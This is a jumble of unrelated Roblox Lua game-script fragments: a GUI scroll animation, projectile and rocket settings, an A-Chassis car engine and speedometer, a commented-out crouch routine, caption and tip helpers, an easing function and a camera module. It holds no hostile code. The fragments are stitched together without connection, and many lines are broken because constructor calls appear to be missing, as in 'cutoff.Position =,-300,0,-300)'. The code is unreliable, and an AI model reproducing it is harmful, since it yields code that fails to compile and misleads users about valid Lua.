currentTrajectory.Acceleration) end
--l.WordWrap = word_wrap
closing=false close.MouseButton1Click:connect(function() --close.Visible = false hidef() closing=true --cutoff.Visible = false end) function showf() script.scrollunroll.Pitch = math.random(900,1100)/1000 script.scrollunroll:Play() close.Visible = true cutoff.Visible = false cutoff.Position =,-300,0,-300) cutoff.Visible = true cutoff:TweenPosition( originalpos , "In", "Quad", .5, true, nil ) wait(.51) cutoff.Size =,600,0,cutoff_start) --cutoff.Visible = true cutoff:TweenSize(,600,0,cutoff_end) , "Out", "Quad", .8, true, nil ) end function hidef() if closing then return end script.scrollroll.Pitch = math.random(900,1100)/1000 script.scrollroll:Play() cutoff:TweenSize(,600,0,cutoff_start) , "Out", "Quad", .3, true, nil ) wait(.31) cutoff:TweenPosition(,-300,0,-300) , "Out", "Quad", .3, true, nil ) wait(.31) cutoff.Visible = false --cutoff.Position = originalpos g:Destroy() end
-- Rocket will fly through things named these
local ROCKET_IGNORE_LIST = {rocket = 1, handle = 1, effect = 1, water = 1} --NOTE: Keys must be lowercase, values must evaluate to true
-- Private Functions
local function getAbsDist(a, b) local d = b - a if (type(d) == "number") then return math.abs(d) end return d.Magnitude end
---------------------------------------------------------------------------------------------------- -------------------=[ PROJETIL ]=------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------
,Distance = 4000 ,BDrop = .25 ,BSpeed = 1600 ,SuppressMaxDistance = 25 --- Studs ,SuppressTime = 10 --- Seconds ,BulletWhiz = false ,BWEmitter = 25 ,BWMaxDistance = 50 ,BulletFlare = false ,BulletFlareColor = Color3.fromRGB(255,255,255) ,Tracer = false ,TracerColor = Color3.fromRGB(255,255,255) ,TracerLightEmission = 1 ,TracerLightInfluence = 0 ,TracerLifeTime = .2 ,TracerWidth = .1 ,RandomTracer = false ,TracerEveryXShots = 5 ,TracerChance = 100 ,BulletLight = false ,BulletLightBrightness = 1 ,BulletLightColor = Color3.fromRGB(255,255,255) ,BulletLightRange = 10 ,ExplosiveHit = false ,ExPressure = 500 ,ExpRadius = 25 ,DestroyJointRadiusPercent = 0 --- Between 0 & 1 ,ExplosionDamage = 100 ,LauncherDamage = 100 ,LauncherRadius = 25 ,LauncherPressure = 500 ,LauncherDestroyJointRadiusPercent = 0
function Engine() script.Parent:WaitForChild("Gauges") script.Parent:WaitForChild("Status") local down1 local down2 local Drive={ car.Wheels.FL:GetChildren(), car.Wheels.FR:GetChildren(), car.Wheels.RL:GetChildren(), car.Wheels.RR:GetChildren() } local Tc={ Speed=0, ThrotAccel=.1, ThrotDecay=.4, ClutchAccel=.1, ClutchDecay=.5, FreeAccel=.1, FreeDecay=.01, BrakeAccel=.5, BrakeDecay=.5, ExpGradient=2, MaxTorque=100000, BrakeMaxTorque=100000, BExpGradient=2, Brakes=4000, --Brake Force ClutchGain=6000, ClutchStall=0, ShiftSpeed=.3, ClutchShiftSpeed=.7, RevBounceP=.93, VariableThrotAdj=.1, Trans={ -- Tuning: -- [1] [2] [3] [4] [5] [6] [7] [8] [9] -- {Int Tq , Peak Tq , Peak Sp , Max Sp , Tq Decay, Limiter , C Tolerance , C Gain , C Stall } {14000 , 19000 , 41 , 68 , 17 , 8 , .7 , .5 , 0 }, --1st {10000 , 12000 , 61 , 82 , 20 , 10 , .2 , .3 , 0 }, --2nd {8000 , 10000 , 115 , 103 , 27 , 13 , .1 , .2 , 0 }, --3rd {5000 , 9000 , 150 , 136 , 28 , 20 , .08 , .15 , 0 }, --4th {2500 , 8800 , 177 , 157 , 50 , 30 , .06 , .1 , 0 }, {2500 , 8400 , 177 , 177 , 50 , 30 , .06 , .1 , 0 }, {2500 , 8000 , 177 , 198 , 50 , 30 , .06 , .1 , 0 }, --5th --6th }, ReverseTq=14000, --Reverse Torque ReverseSp=30, --Max Reverse Speed FDiffPerc=-.2, --Front Differential (-1 -> 1) *value < 0 is outer wheel biased CDiffPerc=.25, --Center Differential (-1 -> 1) *value < 0 is front biased RDiffPerc=-.2, --Rear Differential (-1 -> 1) *value < 0 is outer wheel biased DTrainDist=-.5, --Power Distribution (See below diagram) -- Rear <-|-------|-------|-------|-------|-> Front -- Biased -1 0 1 Biased -- RWD AWD FWD ------------------------------------------- ThrotP=0, MaxThrotP=1, BrakeP=0, ClutchP=0, Throttle=0, Brake=0, Clutch=0, Gear=1, GearShift=1, PrevGear=1, RPM=0, Units={ {"SPS",1}, {"MPH",.682}, {"KPH",1.097} }, CUnit=1 } local Friction={ TractionControl=true, FDownforce=0000, --Front Downforce (Unsprung) RDownforce=40000, --Rear Downforce (Unsprung) FFChange=0, FTolerance=10, FMaxDiff=40, FDecay=1, FGripGain=1, RFChange=-40000, RTolerance=10, RMaxDiff=40, RDecay=.01, RGripGain=.01, PBrakeForce=40000, SkidTol=40, ----------------------------------------- PBrake=false, FSkid=0, RSkid=0, } for i,v in pairs(Drive) do for n,a in pairs(v) do if a.Wheel:FindFirstChild("#AV") then a.Wheel:FindFirstChild("#AV"):Destroy() end local"BodyAngularVelocity",a.Wheel) AV.Name="#AV",0,0),0,0) AV.P=Tc.MaxTorque end end mouse.Button1Up:connect(function() down1=false end) mouse.Button1Down:connect(function() down1=true end) mouse.Button2Up:connect(function() down2=false end) mouse.Button2Down:connect(function() down2=true end) mouse.WheelForward:connect(function() if GMode==1 then Tc.MaxThrotP=math.min(1,Tc.MaxThrotP+Tc.VariableThrotAdj) end end) mouse.WheelBackward:connect(function() if GMode==1 then Tc.MaxThrotP=math.max(0,Tc.MaxThrotP-Tc.VariableThrotAdj) end end) mouse.KeyDown:connect(function(key) if key=="q" then Tc.PrevGear=Tc.Gear Tc.GearShift=0 Tc.Gear=math.max(Tc.Gear-1,-1) elseif key=="e" then Tc.PrevGear=Tc.Gear Tc.GearShift=0 Tc.Gear=math.min(Tc.Gear+1,#Tc.Trans) elseif (string.byte(key)==48 and GMode==1) or (key=="p" and GMode==0) then Friction.PBrake=1 elseif (key=="w" and GMode==1) or (string.byte(key)==48 and GMode==0) then Tc.Clutch=1 elseif key=="t" then Friction.TractionControl=not Friction.TractionControl end end) mouse.KeyUp:connect(function(key) if (string.byte(key)==48 and GMode==1) or (key=="p" and GMode==0) then Friction.PBrake=0 elseif (key=="w" and GMode==1) or (string.byte(key)==48 and GMode==0) then Tc.Clutch=0 end end) local function AChassis() if GMode==0 then Tc.MaxThrotP=1 Tc.MaxBrakeP=1 Tc.Throttle=math.max(car.DriveSeat.Throttle,0) Tc.Brake=math.max(-car.DriveSeat.Throttle,0) elseif GMode==1 then Tc.MaxBrakeP=1 if down1 then Tc.Throttle=1 else Tc.Throttle=0 end if down2 then Tc.Brake=1 else Tc.Brake=0 end else Friction.PBrake=ButtonL1 Tc.Clutch=ButtonR1 Tc.Throttle=math.ceil(RTriggerValue) Tc.MaxThrotP=RTriggerValue Tc.Brake=math.ceil(LTriggerValue) Tc.MaxBrakeP=LTriggerValue^Tc.BExpGradient if Tc.ControllerGUp==0 and ButtonY==1 then Tc.PrevGear=Tc.Gear Tc.GearShift=0 Tc.Gear=math.min(Tc.Gear+1,#Tc.Trans) elseif Tc.ControllerGDown==0 and ButtonX==1 then Tc.PrevGear=Tc.Gear Tc.GearShift=0 Tc.Gear=math.max(Tc.Gear-1,-1) end Tc.ControllerGUp=ButtonY Tc.ControllerGDown=ButtonX end if Tc.Throttle==1 then Tc.ThrotP=math.min(Tc.MaxThrotP,Tc.ThrotP+Tc.ThrotAccel) else Tc.ThrotP=math.max(0,Tc.ThrotP-Tc.ThrotDecay) end if Tc.Brake==1 then Tc.BrakeP=math.min(Tc.MaxBrakeP,Tc.BrakeP+Tc.BrakeAccel) else Tc.BrakeP=math.max(0,Tc.BrakeP-Tc.BrakeDecay) end if Tc.Clutch==1 or Tc.Gear==0 then Tc.ClutchP=math.max(0,Tc.ClutchP-Tc.ClutchDecay) else Tc.ClutchP=math.min(1,Tc.ClutchP+Tc.ClutchAccel) end ------------- Tc.GearShift=math.min(1,Tc.GearShift+Tc.ShiftSpeed+(Tc.ClutchShiftSpeed*(1-Tc.ClutchP))) ---GearChangeBeta local tol=Tc.Trans[math.max(Tc.Gear,1)][7] local NSGear=Tc.Trans[math.max(Tc.Gear,1)][4]+Tc.Trans[math.max(Tc.Gear,1)][6]+3 local OSGear=Tc.Trans[math.max(Tc.PrevGear,1)][4]+Tc.Trans[math.max(Tc.PrevGear,1)][6]+3 local toprev=OSGear+((NSGear-OSGear)*Tc.GearShift) local gearDiff=(Tc.RPM*NSGear)-(Tc.RPM*OSGear) local stall=1 local stalltq=0 if math.abs(gearDiff)>tol then stall=Tc.GearShift if gearDiff>0 then stalltq=Tc.Trans[Tc.Gear][8]*(1-Tc.GearShift) else stalltq=Tc.Trans[Tc.Gear][9]*(1-Tc.GearShift) end end ------------- local frev=0 local rrev=0 for i,v in pairs(Drive[1]) do frev=math.max(frev,v.Wheel.RotVelocity.Magnitude) end for i,v in pairs(Drive[2]) do frev=math.max(frev,v.Wheel.RotVelocity.Magnitude) end for i,v in pairs(Drive[3]) do rrev=math.max(rrev,v.Wheel.RotVelocity.Magnitude) end for i,v in pairs(Drive[4]) do rrev=math.max(rrev,v.Wheel.RotVelocity.Magnitude) end local rev=rrev/toprev if Tc.DTrainDist==1 then rev=frev/toprev elseif Tc.DTrainDist~=-1 then rev=math.max(rev,frev/toprev) end local rGain=(Tc.ThrotP*2)-1 if rGain>0 then rGain=rGain*Tc.FreeAccel else rGain=rGain*Tc.FreeDecay end Tc.RPM=math.min(1,math.max(0,rev*Tc.ClutchP^.3,(Tc.RPM+rGain)*(1-Tc.ClutchP)^.3)) -- A-Chassis 5.0 for i,a in pairs(Drive) do for n,v in pairs(a) do local tq=0 if Tc.Gear>0 then Tc.Speed=toprev if v.Wheel.RotVelocity.Magnitude<Tc.Trans[Tc.Gear][4] then local tPerc=math.min(v.Wheel.RotVelocity.Magnitude/Tc.Trans[Tc.Gear][3],1) local tqChange=Tc.Trans[Tc.Gear][2]-Tc.Trans[Tc.Gear][1] tq=(Tc.Trans[Tc.Gear][1]+(tPerc*tqChange)) else if v.Wheel.RotVelocity.Magnitude<Tc.Trans[Tc.Gear][4]+Tc.Trans[Tc.Gear][6]-1 then local tPerc=(v.Wheel.RotVelocity.Magnitude-Tc.Trans[Tc.Gear][4])/Tc.Trans[Tc.Gear][5] local tqChange=Tc.Trans[Tc.Gear][2] tq=(math.max(0,Tc.Trans[Tc.Gear][2]-(tPerc*tqChange))) else Tc.Speed=(Tc.Trans[Tc.Gear][4]+Tc.Trans[Tc.Gear][6])*Tc.RevBounceP tq=Tc.Trans[Tc.Gear][2]*2 end end elseif Tc.Gear==0 then tq=0 else Tc.Speed=-Tc.ReverseSp tq=Tc.ReverseTq end if i==1 then tq=tq*(1-(GSteer*Tc.FDiffPerc))*(1+math.abs(GSteer*Tc.CDiffPerc))*(1+Tc.DTrainDist) elseif i==2 then tq=tq*(1+(GSteer*Tc.FDiffPerc))*(1+math.abs(GSteer*Tc.CDiffPerc))*(1+Tc.DTrainDist) elseif i==3 then tq=tq*(1-(GSteer*Tc.RDiffPerc))*(1-math.abs(GSteer*Tc.CDiffPerc))*(1-Tc.DTrainDist) else tq=tq*(1+(GSteer*Tc.RDiffPerc))*(1-math.abs(GSteer*Tc.CDiffPerc))*(1-Tc.DTrainDist) end tq=tq*Tc.ThrotP*Tc.ClutchP^Tc.ExpGradient tq=tq+(tq*stalltq) local br=Tc.Brakes*Tc.BrakeP^Tc.ExpGradient tq=math.abs(tq-br) Tc.Speed=Tc.Speed*(1-math.ceil(Tc.BrakeP)) if i>2 and Friction.PBrake==1 then Tc.Speed=0 tq=Friction.PBrakeForce end local Ref=v.Axle.CFrame.lookVector local Speed=Tc.Speed if i==1 or i==3 then Speed=-Speed end local TqVector=1 if Friction.TractionControl then TqVector=math.max(0,Friction.SkidTol-math.abs((v.Wheel.RotVelocity.Magnitude*(v.Wheel.Size.X/2))-v.Wheel.Velocity.Magnitude))/Friction.SkidTol if TqVector<.7 then script.Parent.Gauges.Speedo.TC.Visible=true else script.Parent.Gauges.Speedo.TC.Visible=false end else script.Parent.Gauges.Speedo.TC.Visible=false end v.Wheel["#AV"],math.abs(Ref.y),math.abs(Ref.z))*tq*TqVector v.Wheel["#AV"].angularvelocity=Ref*Speed*stall v.Wheel["#AV"].P=Tc.MaxTorque*TqVector end end end script.Parent.Gauges.Speedo.Units.MouseButton1Click:connect(function() if Tc.CUnit>=3 then Tc.CUnit=1 else Tc.CUnit=Tc.CUnit+1 end script.Parent.Gauges.Speedo.Units.Text=Tc.Units[Tc.CUnit][1] end) local numbers={180354176,180354121,180354128,180354131,180354134,180354138,180354146,180354158,180354160,180354168,180355596,180354115} local function Speedometer() --Sound car.DriveSeat.Rev.Pitch=car.DriveSeat.Rev.SetPitch.Value+car.DriveSeat.Rev.SetRev.Value*Tc.RPM car.DriveSeat.Rel.Pitch=car.DriveSeat.Rel.SetPitch.Value+car.DriveSeat.Rel.SetRev.Value*Tc.RPM car.DriveSeat.Rev.Volume=car.DriveSeat.Rev.SetVolume.Value*Tc.ThrotP car.DriveSeat.Rel.Volume=car.DriveSeat.Rel.SetVolume.Value*(1-Tc.ThrotP) if Tc.Throttle ~= 1 then car.DriveSeat.Backfire.Volume=math.min(math.max((Tc.RPM-.5)/.5,0)*.7,car.DriveSeat.Backfire.Volume+.07) else car.DriveSeat.Backfire.Volume=math.max(car.DriveSeat.Backfire.Volume-.07,0) end --Afterburn if Tc.PrevThrot~=Tc.Throttle and Tc.RPM > .6 then local a=math.random(0,1) if a==1 then coroutine.resume(coroutine.create(function() for i,v in pairs(car.Body.Exhaust:GetChildren()) do v.Afterburn.Rate=10 end wait(.1) for i,v in pairs(car.Body.Exhaust:GetChildren()) do v.Afterburn.Rate=0 end end)) end end --Speedo local fwheel=Tc.RPM*(Tc.Trans[math.max(Tc.Gear,1)][4]+Tc.Trans[math.max(Tc.Gear,1)][6]) local z1=math.min(1,math.max(0,fwheel-(Tc.Trans[math.max(Tc.Gear,1)][3]*.5))/(Tc.Trans[math.max(Tc.Gear,1)][3]-(Tc.Trans[math.max(Tc.Gear,1)][3]*.5))) local z2=math.min(1,math.max(0,fwheel-Tc.Trans[math.max(Tc.Gear,1)][4])/Tc.Trans[math.max(Tc.Gear,1)][6]) local blue=1-z1 local red=z2*2 local green=0 if fwheel>Tc.Trans[math.max(Tc.Gear,1)][4] then green=1-z2 else green=math.max(.45,z1*2) end for i,v in pairs(script.Parent.Gauges.Tach:GetChildren()) do local n=tonumber(string.match(v.Name, "%d+")) if n~=nil then if n%2 == 0 then,4,0,((1-math.abs(Tc.RPM-((n-1)/18)))^12*-40)-10) else,6,0,((1-math.abs(Tc.RPM-((n-1)/18)))^12*-40)-10) end v.P.BackgroundColor3 =,green,blue) end end local sp=car.DriveSeat.Velocity.Magnitude*Tc.Units[Tc.CUnit][2] if sp<1000 then local nnn=math.floor(sp/100) local nn=(math.floor(sp/10))-(nnn*10) local n=(math.floor(sp)-(nn*10))-(nnn*100) script.Parent.Gauges.Speedo.A.Image=""..numbers[n+1] if sp>=10 then script.Parent.Gauges.Speedo.B.Image=""..numbers[nn+1] else script.Parent.Gauges.Speedo.B.Image=""..numbers[12] end if sp>=100 then script.Parent.Gauges.Speedo.C.Image=""..numbers[nnn+1] else script.Parent.Gauges.Speedo.C.Image=""..numbers[12] end else script.Parent.Gauges.Speedo.A.Image=""..numbers[10] script.Parent.Gauges.Speedo.B.Image=""..numbers[10] script.Parent.Gauges.Speedo.C.Image=""..numbers[10] end if Tc.Gear>=0 then script.Parent.Gauges.Gear.G.Image=""..numbers[Tc.Gear+1] else script.Parent.Gauges.Gear.G.Image=""..numbers[11] end --Status Indicators,4,-Tc.ClutchP,0),4,-Tc.ThrotP,0),4,-Tc.BrakeP,0),4,-Tc.MaxThrotP,0) GSpeed=car.DriveSeat.Velocity.Magnitude GTopSp=Tc.Trans[#Tc.Trans][4]+Tc.Trans[#Tc.Trans][6] GRev=Tc.RPM GThrottle=Tc.ThrotP GBrake=Tc.BrakeP Tc.PrevThrot=Tc.Throttle end local function Smoke() local tireSP={} for i,v in pairs(Drive) do for n,a in pairs(v) do if a.Wheel:FindFirstChild("Smoke")~=nil and a.Wheel:FindFirstChild("Squeal")~=nil then if workspace:FindPartOnRay(,,-a.Wheel.Size.X/2,0)),car) then a.Wheel.Smoke.Enabled=math.abs((a.Wheel.RotVelocity.Magnitude*(a.Wheel.Size.X/2))-a.Wheel.Velocity.Magnitude)>20 a.Wheel.Squeal.Volume=math.min(1,math.max(0,math.abs((a.Wheel.RotVelocity.Magnitude*(a.Wheel.Size.X/2))-a.Wheel.Velocity.Magnitude)-20)/20) else a.Wheel.Smoke.Enabled=false a.Wheel.Squeal.Volume=0 end end end end end --run:BindToRenderStep("AChassis",Enum.RenderPriority.Last.Value,AChassis) --run:BindToRenderStep("Speedometer",Enum.RenderPriority.Last.Value,Speedometer) --run:BindToRenderStep("Smoke",Enum.RenderPriority.Last.Value,Smoke) --table.insert(Binded,"AChassis") --table.insert(Binded,"Speedometer") --table.insert(Binded,"Smoke") table.insert(LoopRun,AChassis) table.insert(LoopRun,Speedometer) table.insert(LoopRun,Smoke) end Engine()
--[[function v3:crouch(p1) local v38 = true; if v2.crouching == true then for v39, v40 in pairs((workspace:GetPartsInPart(l__Collision__11, v32))) do if v40.CollisionGroupId == 9 then v38 = false; end; end; end; if v38 == true and v2.camlock == nil and v2.stopcam == false then if p1 ~= nil then v2.crouching = p1; else v2.crouching = not v2.crouching; end; if v2.crouching == true then v34.Crouch:Play(0.2, 1, 0); v2.spring:Impulse(, 2), -10, math.random(-2, 2))); v3.updatespeed(); v33.Crouch.ImageTransparency = 0; v33.Crouch.Image = "rbxassetid://8571432274"; if v5() ~= "mobile" then v33.Crouch.BackgroundTransparency = 1; l__TweenService__8:Create(v33.Crouch,, Enum.EasingStyle.Exponential, Enum.EasingDirection.In), { BackgroundTransparency = 1, ImageTransparency = 0.5 }):Play(); return; else v33.Crouch.BackgroundTransparency = 0.35; v33.Crouch.ImageTransparency = 0; return; end; end; v34.Crouch:Stop(0.2); v2.spring:Impulse(, 2), 5, math.random(-2, 2))); v3.updatespeed(); v33.Crouch.ImageTransparency = 0; v33.Crouch.Image = "rbxassetid://8571378399"; if v5() ~= "mobile" then v33.Crouch.BackgroundTransparency = 1; l__TweenService__2:Create(v33.Crouch,, Enum.EasingStyle.Exponential, Enum.EasingDirection.In), { BackgroundTransparency = 1, ImageTransparency = 1 }):Play(); return; else v33.Crouch.BackgroundTransparency = 0.35; v33.Crouch.ImageTransparency = 0; end; end; end; function v3.updatespeed() --u1 = l__Humanoid__9:GetAttribute("SpeedBoost"); if l__Humanoid__9:GetAttribute("SpeedBoostExtra") then --u1 = u1 + l__Humanoid__9:GetAttribute("SpeedBoostExtra"); end; if l__Humanoid__9:GetAttribute("SpeedBoostBehind") then --u1 = u1 + l__Humanoid__9:GetAttribute("SpeedBoostBehind"); end; u2 = 15; if u3 == true then u2 = 11; end; if v2.crouching == true then u2 = 10; l__Collision__11.CollisionGroupId = 10; l__HumanoidRootPart__12.CollisionGroupId = 10; else l__Collision__11.CollisionGroupId = 2; l__HumanoidRootPart__12.CollisionGroupId = 2; end; -- l__Humanoid__9.WalkSpeed = u2 + tonumber(u1); end; l__Humanoid__9:GetAttributeChangedSignal("SpeedBoost"):Connect(v3.updatespeed); l__Humanoid__9:GetAttributeChangedSignal("SpeedBoostExtra"):Connect(v3.updatespeed); l__Humanoid__9:GetAttributeChangedSignal("SpeedBoostBehind"):Connect(v3.updatespeed); v3.updatespeed(); l__UserInputService__7.InputBegan:connect(function(p2, p3) if p2.UserInputType == Enum.UserInputType.MouseButton2 then end; if p3 == true then return; end; if p2.KeyCode == Enum.KeyCode.C or p2.KeyCode == Enum.KeyCode.ButtonB or p2.KeyCode == Enum.KeyCode.LeftControl or p2.KeyCode == Enum.KeyCode.LeftShift then v3.crouch(); end; end); l__UserInputService__7.InputEnded:connect(function(p4) if p4.KeyCode == Enum.KeyCode.Space then v2.holdjump = false; end; if p4.UserInputType == Enum.UserInputType.MouseButton2 then -- nil end; end);--]]
function v3.titlelocation(p1) coroutine.wrap(function() local v6 = l__Parent__1.MainFrame.Intro:Clone(); if l__Parent__1.MainFrame:FindFirstChild("LiveIntro") then l__Parent__1.MainFrame:FindFirstChild("LiveIntro"):Destroy(); end; local v7 = game:GetService("ReplicatedStorage").Sounds:FindFirstChild("LA_" .. p1); if v7 then v7:Play(); end; v6.Name = "LiveIntro"; v6.Visible = true; v6.Text = p1; v6.Parent = l__Parent__1.MainFrame; l__TweenService__2:Create(v6,, Enum.EasingStyle.Quad, Enum.EasingDirection.Out), { TextTransparency = 0, TextStrokeTransparency = 1 }):Play(); l__TweenService__2:Create(v6.Underline,, Enum.EasingStyle.Exponential, Enum.EasingDirection.Out), { Size =, 0, 0, 6) }):Play(); wait(1); l__TweenService__2:Create(v6,, Enum.EasingStyle.Exponential, Enum.EasingDirection.In), { BackgroundTransparency = 1, TextTransparency = 1, TextStrokeTransparency = 2 }):Play(); l__TweenService__2:Create(v6.Underline,, Enum.EasingStyle.Exponential, Enum.EasingDirection.In), { Size =, 0, 0, 6), ImageTransparency = 1 }):Play(); game.Debris:AddItem(v6, 10); end)(); end; local u3 = {}; local u4 = 0; function v3.remind(p2, p3) coroutine.wrap(function() if table.find(u3, p2) ~= nil then return; end; table.insert(u3, p2); if u4 >= 1 then u4 = u4 + 1; wait((u4 - 1) * 6); end; u4 = u4 + 1; local v8 = l__Parent__1.MainFrame.Tip:Clone(); if p3 == true then v8 = l__Parent__1.MainFrame.Warning:Clone(); end; v8.Name = "LiveTip"; v8.Visible = true; v8.Text = p2; v8.Parent = l__Parent__1.MainFrame; l__TweenService__2:Create(v8,, Enum.EasingStyle.Quad, Enum.EasingDirection.Out), { Position =, 0, 0.9, 0) }):Play(); l__TweenService__2:Create(v8.Glow,, Enum.EasingStyle.Quad, Enum.EasingDirection.InOut, 0, true), { Size =, 0, 10, 0), ImageTransparency = 0 }):Play(); wait(6); l__TweenService__2:Create(v8,, Enum.EasingStyle.Quad, Enum.EasingDirection.InOut), { TextTransparency = 1, TextStrokeTransparency = 1 }):Play(); game.Debris:AddItem(v8, 10); u4 = u4 - 1; end)(); end; function v3.caption(p4, p5, p6) local u5 = p6; coroutine.wrap(function() local v9 = l__Parent__1.MainFrame.Caption:Clone(); if l__Parent__1:FindFirstChild("LiveCaption") then l__Parent__1:FindFirstChild("LiveCaption"):Destroy(); end; if p5 == true then v9 = l__Parent__1.MainFrame.Caption:Clone(); end; v9.Name = "LiveCaption"; v9.Visible = true; v9.Text = p4; v9.Parent = l__Parent__1; if not u5 then u5 = 7; end; l__TweenService__2:Create(v9,, Enum.EasingStyle.Exponential, Enum.EasingDirection.In), { BackgroundTransparency = 1, TextTransparency = 1, TextStrokeTransparency = 2 }):Play(); l__TweenService__2:Create(v9,, Enum.EasingStyle.Exponential, Enum.EasingDirection.Out), { BackgroundColor3 =, 0, 0) }):Play(); script.Caption:Play(); game.Debris:AddItem(v9, 10); end)(); end; return v3;
-- p = period -- a = amplitud
local function inOutElastic(t, b, c, d, a, p) if t == 0 then return b end t = t / d * 2 if t == 2 then return b + c end if not p then p = d * (0.3 * 1.5) end if not a then a = 0 end local s if not a or a < abs(c) then a = c s = p / 4 else s = p / (2 * pi) * asin(c / a) end if t < 1 then t = t - 1 return -0.5 * (a * pow(2, 10 * t) * sin((t * d - s) * (2 * pi) / p)) + b else t = t - 1 return a * pow(2, -10 * t) * sin((t * d - s) * (2 * pi) / p ) * 0.5 + c + b end end
-- Movement mode standardized to Enum.ComputerCameraMovementMode values
function ClassicCamera:SetCameraMovementMode(cameraMovementMode: Enum.ComputerCameraMovementMode) BaseCamera.SetCameraMovementMode(self, cameraMovementMode) self.isFollowCamera = cameraMovementMode == Enum.ComputerCameraMovementMode.Follow self.isCameraToggle = cameraMovementMode == Enum.ComputerCameraMovementMode.CameraToggle end function ClassicCamera:Update() local now = tick() local timeDelta = now - self.lastUpdate local camera = workspace.CurrentCamera local newCameraCFrame = camera.CFrame local newCameraFocus = camera.Focus local overrideCameraLookVector = nil if self.resetCameraAngle then local rootPart: BasePart = self:GetHumanoidRootPart() if rootPart then overrideCameraLookVector = (rootPart.CFrame * INITIAL_CAMERA_ANGLE).lookVector else overrideCameraLookVector = INITIAL_CAMERA_ANGLE.lookVector end self.resetCameraAngle = false end local player = PlayersService.LocalPlayer local humanoid = self:GetHumanoid() local cameraSubject = camera.CameraSubject local isInVehicle = cameraSubject and cameraSubject:IsA("VehicleSeat") local isOnASkateboard = cameraSubject and cameraSubject:IsA("SkateboardPlatform") local isClimbing = humanoid and humanoid:GetState() == Enum.HumanoidStateType.Climbing if self.lastUpdate == nil or timeDelta > 1 then self.lastCameraTransform = nil end local rotateInput = CameraInput.getRotation() self:StepZoom() local cameraHeight = self:GetCameraHeight() -- Reset tween speed if user is panning if CameraInput.getRotation() ~= then tweenSpeed = 0 self.lastUserPanCamera = tick() end local userRecentlyPannedCamera = now - self.lastUserPanCamera < TIME_BEFORE_AUTO_ROTATE local subjectPosition: Vector3 = self:GetSubjectPosition() if subjectPosition and player and camera then local zoom = self:GetCameraToSubjectDistance() if zoom < 0.5 then zoom = 0.5 end if self:GetIsMouseLocked() and not self:IsInFirstPerson() then -- We need to use the right vector of the camera after rotation, not before local newLookCFrame: CFrame = self:CalculateNewLookCFrameFromArg(overrideCameraLookVector, rotateInput) local offset: Vector3 = self:GetMouseLockOffset() local cameraRelativeOffset: Vector3 = offset.X * newLookCFrame.RightVector + offset.Y * newLookCFrame.UpVector + offset.Z * newLookCFrame.LookVector --offset can be NAN, NAN, NAN if newLookVector has only y component if Util.IsFiniteVector3(cameraRelativeOffset) then subjectPosition = subjectPosition + cameraRelativeOffset end else local userPanningTheCamera = CameraInput.getRotation() ~= if not userPanningTheCamera and self.lastCameraTransform then local isInFirstPerson = self:IsInFirstPerson() if (isInVehicle or isOnASkateboard or (self.isFollowCamera and isClimbing)) and self.lastUpdate and humanoid and humanoid.Torso then if isInFirstPerson then if self.lastSubjectCFrame and (isInVehicle or isOnASkateboard) and cameraSubject:IsA("BasePart") then local y = -Util.GetAngleBetweenXZVectors(self.lastSubjectCFrame.lookVector, cameraSubject.CFrame.lookVector) if Util.IsFinite(y) then rotateInput = rotateInput +, 0) end tweenSpeed = 0 end elseif not userRecentlyPannedCamera then local forwardVector = humanoid.Torso.CFrame.lookVector tweenSpeed = math.clamp(tweenSpeed + tweenAcceleration * timeDelta, 0, tweenMaxSpeed) local percent = math.clamp(tweenSpeed * timeDelta, 0, 1) if self:IsInFirstPerson() and not (self.isFollowCamera and self.isClimbing) then percent = 1 end local y = Util.GetAngleBetweenXZVectors(forwardVector, self:GetCameraLookVector()) if Util.IsFinite(y) and math.abs(y) > 0.0001 then rotateInput = rotateInput + * percent, 0) end end elseif self.isFollowCamera and (not (isInFirstPerson or userRecentlyPannedCamera) and not VRService.VREnabled) then -- Logic that was unique to the old FollowCamera module local lastVec = -(self.lastCameraTransform.p - subjectPosition) local y = Util.GetAngleBetweenXZVectors(lastVec, self:GetCameraLookVector()) -- This cutoff is to decide if the humanoid's angle of movement, -- relative to the camera's look vector, is enough that -- we want the camera to be following them. The point is to provide -- a sizable dead zone to allow more precise forward movements. local thetaCutoff = 0.4 -- Check for NaNs if Util.IsFinite(y) and math.abs(y) > 0.0001 and math.abs(y) > thetaCutoff * timeDelta then rotateInput = rotateInput +, 0) end end end end if not self.isFollowCamera then local VREnabled = VRService.VREnabled if VREnabled then newCameraFocus = self:GetVRFocus(subjectPosition, timeDelta) else newCameraFocus = end local cameraFocusP = newCameraFocus.p if VREnabled and not self:IsInFirstPerson() then local vecToSubject = (subjectPosition - camera.CFrame.p) local distToSubject = vecToSubject.magnitude local flaggedRotateInput = rotateInput -- Only move the camera if it exceeded a maximum distance to the subject in VR if distToSubject > zoom or flaggedRotateInput.x ~= 0 then local desiredDist = math.min(distToSubject, zoom) vecToSubject = self:CalculateNewLookVectorFromArg(nil, rotateInput) * desiredDist local newPos = cameraFocusP - vecToSubject local desiredLookDir = camera.CFrame.lookVector if flaggedRotateInput.x ~= 0 then desiredLookDir = vecToSubject end local lookAt = + desiredLookDir.x, newPos.y, newPos.z + desiredLookDir.z) newCameraCFrame =, lookAt) +, cameraHeight, 0) end else local newLookVector = self:CalculateNewLookVectorFromArg(overrideCameraLookVector, rotateInput) newCameraCFrame = - (zoom * newLookVector), cameraFocusP) end else -- is FollowCamera local newLookVector = self:CalculateNewLookVectorFromArg(overrideCameraLookVector, rotateInput) if VRService.VREnabled then newCameraFocus = self:GetVRFocus(subjectPosition, timeDelta) else newCameraFocus = end newCameraCFrame = - (zoom * newLookVector), newCameraFocus.p) +, cameraHeight, 0) end local toggleOffset = self:GetCameraToggleOffset(timeDelta) newCameraFocus = newCameraFocus + toggleOffset newCameraCFrame = newCameraCFrame + toggleOffset self.lastCameraTransform = newCameraCFrame self.lastCameraFocus = newCameraFocus if (isInVehicle or isOnASkateboard) and cameraSubject:IsA("BasePart") then self.lastSubjectCFrame = cameraSubject.CFrame else self.lastSubjectCFrame = nil end end self.lastUpdate = now return newCameraCFrame, newCameraFocus end function ClassicCamera:EnterFirstPerson() self.inFirstPerson = true self:UpdateMouseBehavior() end function ClassicCamera:LeaveFirstPerson() self.inFirstPerson = false self:UpdateMouseBehavior() end return ClassicCamera
--------------| SYSTEM SETTINGS |--------------
